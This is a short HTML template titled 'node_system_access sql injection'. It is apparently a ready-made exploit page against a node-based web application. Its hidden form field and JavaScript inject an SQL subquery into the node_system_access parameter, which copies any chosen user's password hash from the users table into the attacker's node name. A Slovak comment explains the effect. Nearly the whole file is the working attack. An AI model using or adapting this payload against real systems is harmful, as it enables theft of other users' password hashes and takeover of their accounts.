templates/own_templates/1549536.tpl

   1 <!--
   2 This program is free software. It comes without any warranty, to
   3 the extent permitted by applicable law. You can redistribute it
   4 and/or modify it under the terms of the Do What The Fuck You Want
   5 To Public License, Version 2, as published by Sam Hocevar. See
   6 http://sam.zoy.org/wtfpl/COPYING for more details.
   7 -->
   8
   9 <html>
  10 <head>
  11 <title>node_system_access sql injection</title>
  12 <meta http-equiv="Cache-Control" content="Public">
  13 <meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
  14 <link rel="shortcut icon" href="/id/1459933/download">
  15 <link rel='stylesheet' type='text/css' href='/id/1126515/download'>
  16 </head>
  17
  18 <body>
  19 <script type="text/javascript">
  20 function access_node_system(what)
  21 {
  22  var id = document.getElementById('user_id').value;
  23  if(!isNaN(id)) {
  24   document.getElementById('node_system_access').value = "public', node_name=(select password from users where user_id='"+id+"'), node_parent='";
  25   what.submit();
  26  }
  27 }
  28 </script>
  29 nastavi tvoj system_access na 'public', tvoj node_name na hash of desired id's pwd a tvojho parenta na ''
  30 <br>
  31 <noscript>javascript not enabled, user_id defaults to {$user_id}</noscript>
  32 <form method="post" enctype="multipart/form-data" action="/id/{$user_id}/">
  33 <input type="hidden" name="node_system_access" id="node_system_access" value="public', node_name=(select password from users where user_id='{$user_id}'), node_parent='">
  34 <input type="hidden" name="event" value="configure_system_access">
  35 <script type="text/javascript">
  36 document.write("<input type="text" size="7" name="user_id" id="user_id" value="{$user_id}">");
  37 </script>
  38 <input type="submit" value="get_pwd_hash" onclick="access_node_system(this);return false">
  39 </form>
  40
  41